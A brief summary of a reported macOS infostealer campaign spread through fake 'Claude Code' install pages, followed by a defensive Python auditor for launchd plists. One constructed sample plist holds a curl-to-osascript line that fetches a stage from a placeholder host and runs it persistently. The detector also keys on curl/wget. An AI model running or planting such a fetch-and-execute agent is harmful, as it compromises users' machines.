Bybit Uncovers AI-Assisted macOS Malware Targeting Developers

Bybit’s Security Operations Center disclosed a sophisticated, multi-stage macOS malware campaign that poisoned search results for `Claude Code` and other AI development queries. Attackers used SEO poisoning to push a spoofed installation page, delivering a `Mach-O` dropper that executed an `osascript`-based infostealer and harvested **browser credentials**, **macOS Keychain** entries, **Telegram sessions**, **VPN profiles**, and crypto wallet data. The campaign pivoted to a C++ backdoor with sandbox detection, encrypted runtime configs, persistent system agents, and HTTP-based remote control. Bybit identified targeted access attempts against **250+** browser wallet extensions and desktop wallets. Bybit also used AI-assisted analysis to accelerate triage, reverse engineering, and behavioral classification, reducing investigation time from hours to minutes. The disclosure is one of the first from a centralized crypto exchange highlighting developer-focused SEO poisoning tied to AI tool discovery.
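The persistence and `osascript` tradecraft summarized above are the kind of thing a defender can audit in macOS launchd agents. The following is an added example, not code from Bybit or from the report; it assumes the "persistent system agents" are launchd property lists (the report does not name the mechanism), and both sample plists, including the placeholder host, are constructed for illustration.

```python
import plistlib

# Signals checked in a LaunchAgent/LaunchDaemon plist: an interpreter
# (osascript or a shell) started with inline code, a network fetch tool
# in the command line, and always-on persistence flags. Assumption: the
# campaign's "persistent system agents" are launchd plists.
INLINE_INTERPRETERS = {"osascript", "sh", "bash", "zsh", "python", "python3"}
NETWORK_TOOLS = {"curl", "wget"}

# Constructed benign sample: a scheduled backup job with a plain binary.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key>
  <array><string>/usr/local/bin/backup</string><string>--daily</string></array>
  <key>StartCalendarInterval</key><dict><key>Hour</key><integer>2</integer></dict>
</dict></plist>"""

# Constructed suspicious sample: shell one-liner that pulls a stage from
# a placeholder host and pipes it into osascript, restarted on every login.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdatehelper</string>
  <key>ProgramArguments</key>
  <array><string>/bin/sh</string><string>-c</string>
  <string>curl -s http://PLACEHOLDER.invalid/stage2 | osascript</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

def audit_launch_agent(plist_bytes: bytes) -> list[str]:
    """Return the reasons a launchd plist looks suspicious (empty if none)."""
    data = plistlib.loads(plist_bytes)
    args = data.get("ProgramArguments") or ([data["Program"]] if "Program" in data else [])
    reasons: list[str] = []
    if not args:
        return reasons
    exe = args[0].rsplit("/", 1)[-1]            # basename of the launched program
    tokens = {t for a in args for t in a.split()}  # every whitespace-separated word
    if exe in INLINE_INTERPRETERS and any(a in ("-e", "-c") for a in args[1:]):
        reasons.append(f"{exe} launched with inline code: {args[1:]}")
    if tokens & NETWORK_TOOLS:
        reasons.append("fetches content from the network at launch: " + " ".join(args))
    # Always-on flags only aggravate an already suspicious command line.
    if reasons and data.get("RunAtLoad") and data.get("KeepAlive"):
        reasons.append("RunAtLoad+KeepAlive: restarted automatically (persistent)")
    return reasons
```

Running `audit_launch_agent` over every plist under `~/Library/LaunchAgents` and `/Library/LaunchAgents` turns the summary's behaviours into a concrete triage list.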